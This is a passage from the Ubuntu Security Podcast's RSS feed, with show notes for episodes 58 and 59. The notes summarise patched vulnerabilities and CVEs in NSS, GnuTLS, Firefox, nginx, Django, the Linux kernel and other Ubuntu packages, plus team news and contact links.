<li><a href="https://ubuntusecuritypodcast.org/episode-57/">Episode 57</a>, <a href="https://ubuntusecuritypodcast.org/episode-55/">Episode 55</a></li>
<li>Heap based buffer over-reads - info leak or crash -&gt; DoS</li>
<li>Heap based buffer over-flow - crash -&gt; DoS, RCE</li>
<li>NULL ptr derefs - crash -&gt; DoS</li>
<li>Memory overallocation -&gt; memory based remote DoS</li>
</ul>
<h3 id="usn-4231-1-nss-vulnerability-03-04">[<a href="https://usn.ubuntu.com/4231-1/">USN-4231-1</a>] NSS vulnerability [03:04]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17006">CVE-2019-17006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UBSAN found possible buffer overflow due to failure to check lengths of
inputs to various functions - so applications using libnss for crypto
could be vulnerable to buffer overflow</li>
</ul>
<h3 id="usn-4233-1-gnutls-update-03-54">[<a href="https://usn.ubuntu.com/4233-1/">USN-4233-1</a>] GnuTLS update [03:54]</h3>
<ul>
<li>Affecting Xenial, Bionic</li>
<li>Update marks SHA1 as being untrusted for digital signature operations -
SHA1 has been broken in theory for a while and 2017 Google showed the
first SHA1 collision - recently the first chosen-prefix attack was
demonstrated against SHA1 as well - demonstrated by creating a GPG key
which can impersonate another</li>
<li>As such GnuTLS will not trust SHA1 based digital signatures since these
can relatively easily be forged now (but not for an arbitrary input)</li>
<li>As such libraries / applications which use GnuTLS (libsoup, Epiphany)
will not trust SHA1 based digital signatures</li>
<li><a href="https://sha-mbles.github.io/">https://sha-mbles.github.io/</a></li>
</ul>
<h3 id="usn-4234-1-firefox-vulnerabilities-06-10">[<a href="https://usn.ubuntu.com/4234-1/">USN-4234-1</a>] Firefox vulnerabilities [06:10]</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17026">CVE-2019-17026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17025">CVE-2019-17025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17024">CVE-2019-17024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17023">CVE-2019-17023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17022">CVE-2019-17022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17020">CVE-2019-17020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17017">CVE-2019-17017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17016">CVE-2019-17016</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream Firefox release (72.0.1)</li>
<li>Usual sorts of issues fixed: DoS, info disclosure, bypass content
security policy restrictions, conduct XSS attacks or execute arbitrary
code</li>
</ul>
<h3 id="usn-4047-2-libvirt-update-vulnerability-06-48">[<a href="https://usn.ubuntu.com/4047-2/">USN-4047-2</a>] libvirt update vulnerability [06:48]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10161">CVE-2019-10161</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> libvirt updated for regular releases - various APIs which
could cause effects were accessible to read-only users</li>
<li>Now backported for 14.04 ESM users / customers as well</li>
</ul>
<h3 id="usn-4235-1-usn-4235-2-nginx-vulnerability-07-18">[<a href="https://usn.ubuntu.com/4235-1/">USN-4235-1</a>, <a href="https://usn.ubuntu.com/4235-2/">USN-4235-2</a>] nginx vulnerability [07:18]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20372">CVE-2019-20372</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP request smuggling (<a href="https://ubuntusecuritypodcast.org/episode-52/">Episode 52</a>) - allowed attacker to read
unauthorized web pages where nginx is being fronted by a load balanced
when used with certain error_page configurations</li>
</ul>
<h3 id="usn-4236-1-usn-4236-2-libgcrypt-vulnerability-08-03">[<a href="https://usn.ubuntu.com/4236-1/">USN-4236-1</a>, USN-4236-2] Libgcrypt vulnerability [08:03]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13627">CVE-2019-13627</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ECDSA timing side-channel attack (Minerva)
<ul>
<li>observe timing of signature generation on known messages to indicate
the bit-length of the random nonce scalar during scalar multiplication
on an elliptic curve - full private key is able to be recovered using
lattice techniques</li>
</ul>
</li>
<li><a href="https://minerva.crocs.fi.muni.cz/">https://minerva.crocs.fi.muni.cz/</a></li>
</ul>
<h3 id="usn-4237-1-usn-4237-2-spamassassin-vulnerabilities-09-04">[<a href="https://usn.ubuntu.com/4237-1/">USN-4237-1</a>, <a href="https://usn.ubuntu.com/4237-2/">USN-4237-2</a>] SpamAssassin vulnerabilities [09:04]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12420">CVE-2019-12420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11805">CVE-2018-11805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via excessive resource usage</li>
<li>RCE via crafted conf (CF) files - advised should only use trusted conf
files</li>
</ul>
<h3 id="usn-4238-1-sdl-image-vulnerabilities-09-55">[<a href="https://usn.ubuntu.com/4238-1/">USN-4238-1</a>] SDL_image vulnerabilities [09:55]</h3>
<ul>
<li>12 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7635">CVE-2019-7635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5052">CVE-2019-5052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5051">CVE-2019-5051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13616">CVE-2019-13616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12222">CVE-2019-12222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12221">CVE-2019-12221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12220">CVE-2019-12220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12219">CVE-2019-12219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12218">CVE-2019-12218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12217">CVE-2019-12217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12216">CVE-2019-12216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3977">CVE-2018-3977</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Image loading library for SDL1.2 (low level library used for various
games etc - provides common access to audio, input devices, graphics etc)</li>
<li>Large C code-base - usual memory safety issues -&gt; usual effects -&gt; crash,
DoS or possible RCE</li>
</ul>
<h3 id="usn-4239-1-php-vulnerabilities-10-32">[<a href="https://usn.ubuntu.com/4239-1/">USN-4239-1</a>] PHP vulnerabilities [10:32]</h3>
<ul>
<li>4 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11050">CVE-2019-11050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11047">CVE-2019-11047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11046">CVE-2019-11046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11045">CVE-2019-11045</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 heap buffer over-reads in parsing EXIF information, 1 over-read in
bcmath extension, and 1 issue with handling filenames with embedded NUL
bytes</li>
</ul>
<h3 id="usn-4221-2-libpcap-vulnerability-11-28">[<a href="https://usn.ubuntu.com/4221-2/">USN-4221-2</a>] libpcap vulnerability [11:28]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15165">CVE-2019-15165</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-56/">Episode 56</a></li>
</ul>
<h3 id="usn-4240-1-kamailio-vulnerability-11-42">[<a href="https://usn.ubuntu.com/4240-1/">USN-4240-1</a>] Kamailio vulnerability [11:42]</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8828">CVE-2018-8828</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SIP server written in C</li>
<li>Heap based buffer overflow when receiving a specially crafted REGISTER
message</li>
</ul>
<h3 id="usn-4241-1-thunderbird-vulnerabilities-11-59">[<a href="https://usn.ubuntu.com/4241-1/">USN-4241-1</a>] Thunderbird vulnerabilities [11:59]</h3>
<ul>
<li>11 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11745">CVE-2019-11745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17026">CVE-2019-17026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17024">CVE-2019-17024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17022">CVE-2019-17022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17017">CVE-2019-17017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17016">CVE-2019-17016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17012">CVE-2019-17012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17011">CVE-2019-17011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17010">CVE-2019-17010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17008">CVE-2019-17008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17005">CVE-2019-17005</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream release (68.4.1)</li>
<li>Derived from Firefox code-base so contains fixes for lots issues which
also affected Firefox above</li>
</ul>
<h3 id="usn-4225-2-linux-kernel--hwe--vulnerabilities-12-21">[<a href="https://usn.ubuntu.com/4225-2/">USN-4225-2</a>] Linux kernel (HWE) vulnerabilities [12:21]</h3>
<ul>
<li>15 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18813">CVE-2019-18813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19534">CVE-2019-19534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19529">CVE-2019-19529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19524">CVE-2019-19524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19072">CVE-2019-19072</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19055">CVE-2019-19055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19052">CVE-2019-19052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19051">CVE-2019-19051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19045">CVE-2019-19045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18660">CVE-2019-18660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16231">CVE-2019-16231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-58/">Episode 58</a> - eoan (19.10) 5.3 kernel is now used as the HWE kernel for
bionic (18.04 LTS)</li>
</ul>
<h3 id="usn-4242-1-sysstat-vulnerabilities-13-07">[<a href="https://usn.ubuntu.com/4242-1/">USN-4242-1</a>] Sysstat vulnerabilities [13:07]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19725">CVE-2019-19725</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16167">CVE-2019-16167</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Both issues occur when reading a crafted input file using the sadf
utility - likely the original reported is fuzzing this</li>
<li>Double free - heap corruption but on Ubuntu we enable the glibc
heap-protector so this is just a crash -&gt; DoS</li>
<li>Integer overflow -&gt; heap buffer overflow when reading crafted input file</li>
</ul>
<h3 id="usn-4243-1-libbsd-vulnerabilities-14-12">[<a href="https://usn.ubuntu.com/4243-1/">USN-4243-1</a>] libbsd vulnerabilities [14:12]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20367">CVE-2019-20367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2090">CVE-2016-2090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Library providing common BSD C functions which are not available on Linux
(strlcpy() etc)
<ul>
<li>OOB read (crash -&gt; DoS)</li>
<li>Off-by-one in fgetwln() (get line of wide characters from a stream) -&gt;
heap buffer overflow -&gt; crash / RCE (doesn&rsquo;t appear to be used by any
software in Ubuntu)</li>
</ul>
</li>
</ul>
<h3 id="usn-4244-1-samba-vulnerabilities-15-15">[<a href="https://usn.ubuntu.com/4244-1/">USN-4244-1</a>] Samba vulnerabilities [15:15]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19344">CVE-2019-19344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14907">CVE-2019-14907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14902">CVE-2019-14902</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in DNS zone scavenging in AD DC</li>
<li>Crash if fail to convert characters at log level 3</li>
<li>Does not automatically replicate ACLs which are set to inherit down a
subtree (unable to be easily backported to Xenial so only fixed on
Bionic, Disco and Eoan - instead can workaround by manually replication
ACLs from one DC to another for a given naming context)</li>
</ul>
<h3 id="usn-4245-1-pysaml2-vulnerability-16-32">[<a href="https://usn.ubuntu.com/4245-1/">USN-4245-1</a>] PySAML2 vulnerability [16:32]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-5390">CVE-2020-5390</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>May fail to properly validate signatures in a particularly crafted SAML
document by using the wrong data - so could assert a document has been
fully signed when only a part of it has</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="mid-cycle-product-roadmap-sprint-17-18">Mid cycle product roadmap sprint [17:18]</h3>
<ul>
<li>Security team presents progress on plans for Ubuntu 20.04 Focal Fossa -
ie. ESM offerings, AppArmor features, snapd security features, Ubuntu
Core security features, MIR security reviews progress etc</li>
<li>Represented by Joe McManus, Mark Morlino, Chris Coulson and John Johansen</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E059.mp3" length="19134301" type="audio/mpeg" /><itunes:duration>19:55</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 58
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-58/</link>
          <pubDate>Thu, 09 Jan 2020 16:18:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>aa89e8be26bc96c93cdda67991584e240fb69ddc262f36bc78c6a68036b1f3f625c4c73f925044ad21e00debb61ddf7498c304e58b97ad272607ec46c5835760</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 58</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In the first episode for 2020, we look at security updates for Django and
  the Linux kernel, plus Alex and Joe discuss security and privacy aspects of
  smart assistant connected devices.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In the first episode for 2020, we look at security updates for Django and
  the Linux kernel, plus Alex and Joe discuss security and privacy aspects of
  smart assistant connected devices.
  </itunes:summary>
        <description>  In the first episode for 2020, we look at security updates for Django and
  the Linux kernel, plus Alex and Joe discuss security and privacy aspects of
  smart assistant connected devices.
  </description>
        <googleplay:description>  In the first episode for 2020, we look at security updates for Django and
  the Linux kernel, plus Alex and Joe discuss security and privacy aspects of
  smart assistant connected devices.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In the first episode for 2020, we look at security updates for Django and
the Linux kernel, plus Alex and Joe discuss security and privacy aspects of
smart assistant connected devices.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>34 unique CVEs addressed</p>
<h3 id="usn-4224-1-django-vulnerability-00-51">[<a href="https://usn.ubuntu.com/4224-1/">USN-4224-1</a>] Django vulnerability [00:51]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19844">CVE-2019-19844</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Account takeover via password reset - when comparing email addresses,
would not do a proper unicode comparison - and so could specify an email
address which appears equal to an existing users email address (after
unicode case and character transmformation) and would then get sent a
token to reset their accounts password to your doppleganger email
address. Fix includes doing both a proper unicode case comparison AND
sending the password reset token to the email address to the one
registered against the user account, not the one input to the password
reset field.</li>
</ul>
<h3 id="usn-4225-1-linux-kernel-vulnerabilities-02-25">[<a href="https://usn.ubuntu.com/4225-1/">USN-4225-1</a>] Linux kernel vulnerabilities [02:25]</h3>
<ul>
<li>5.3 kernel</li>
<li>18 CVEs addressed in Bionic (Azure and GCP edge), Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18813">CVE-2019-18813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19807">CVE-2019-19807</a> <!-- raw HTML omitted -->
<ul>
<li>UAF in ALSA timer implementation - local user - crash (DoS) / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19534">CVE-2019-19534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19529">CVE-2019-19529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19524">CVE-2019-19524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19072">CVE-2019-19072</a> <!-- raw HTML omitted -->
<ul>
<li>Memory leak in tracing subsystem -&gt; DoS</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19055">CVE-2019-19055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19052">CVE-2019-19052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19051">CVE-2019-19051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19047">CVE-2019-19047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19045">CVE-2019-19045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19044">CVE-2019-19044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18660">CVE-2019-18660</a> <!-- raw HTML omitted -->
<ul>
<li>SpectreRSB mitigations not properly enforced on PPC</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-16231">CVE-2019-16231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Libertas Wifi Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Wifi-Ex Driver - OTA - crash / ACE</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4226-1-linux-kernel-vulnerabilities-03-58">[<a href="https://usn.ubuntu.com/4226-1/">USN-4226-1</a>] Linux kernel vulnerabilities [03:58]</h3>
<ul>
<li>5.0 kernel</li>
<li>28 CVEs addressed in Bionic (AWS &amp; Oracle Edge, Azure, GKE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18813">CVE-2019-18813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17075">CVE-2019-17075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2214">CVE-2019-2214</a> <!-- raw HTML omitted -->
<ul>
<li>Binder IPC OOB write - crash, ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19922">CVE-2019-19922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19534">CVE-2019-19534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19532">CVE-2019-19532</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19529">CVE-2019-19529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19526">CVE-2019-19526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19524">CVE-2019-19524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19083">CVE-2019-19083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19075">CVE-2019-19075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19072">CVE-2019-19072</a> <!-- raw HTML omitted -->
<ul>
<li>Memory leak in tracing subsystem -&gt; DoS</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19067">CVE-2019-19067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19065">CVE-2019-19065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19060">CVE-2019-19060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19055">CVE-2019-19055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19052">CVE-2019-19052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19048">CVE-2019-19048</a> <!-- raw HTML omitted -->
<ul>
<li>Memory leak in virtualbox guest driver -&gt; DoS</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19045">CVE-2019-19045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18660">CVE-2019-18660</a> <!-- raw HTML omitted -->
<ul>
<li>SpectreRSB mitigations not properly enforced on PPC</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-17133">CVE-2019-17133</a> <!-- raw HTML omitted -->
<ul>
<li>Wifi stack failed to validate SSID IE length - buffer overflow</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-16233">CVE-2019-16233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16231">CVE-2019-16231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Libertas Wifi Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Wifi-Ex Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10220">CVE-2019-10220</a> <!-- raw HTML omitted -->
<ul>
<li>Kernel CIFS impl failed to sanitize paths returned from SMB server -
malicious server could overwrite arbitrary files on the client</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4227-1-usn-4227-2-linux-kernel-vulnerabilities-05-36">[<a href="https://usn.ubuntu.com/4227-1/">USN-4227-1</a>, <a href="https://usn.ubuntu.com/4227-2/">USN-4227-2</a>] Linux kernel vulnerabilities [05:36]</h3>
<ul>
<li>14 CVEs addressed in Xenial, Bionic, Trusty ESM (Azure)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19807">CVE-2019-19807</a> <!-- raw HTML omitted -->
<ul>
<li>UAF in ALSA timer implementation - local user - crash (DoS) / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-19534">CVE-2019-19534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19529">CVE-2019-19529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19524">CVE-2019-19524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19083">CVE-2019-19083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19052">CVE-2019-19052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19045">CVE-2019-19045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18660">CVE-2019-18660</a> <!-- raw HTML omitted -->
<ul>
<li>SpectreRSB mitigations not properly enforced on PPC</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-16233">CVE-2019-16233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16231">CVE-2019-16231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Libertas Wifi Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Wifi-Ex Driver - OTA - crash / ACE</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4228-1-usn-4228-2-linux-kernel-vulnerabilities-06-17">[<a href="https://usn.ubuntu.com/4228-1/">USN-4228-1</a>, <a href="https://usn.ubuntu.com/4228-2/">USN-4228-2</a>] Linux kernel vulnerabilities [06:17]</h3>
<ul>
<li>8 CVEs addressed in Xenial, Trusty ESM (Xenial HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19534">CVE-2019-19534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19524">CVE-2019-19524</a> <!-- raw HTML omitted --></li>
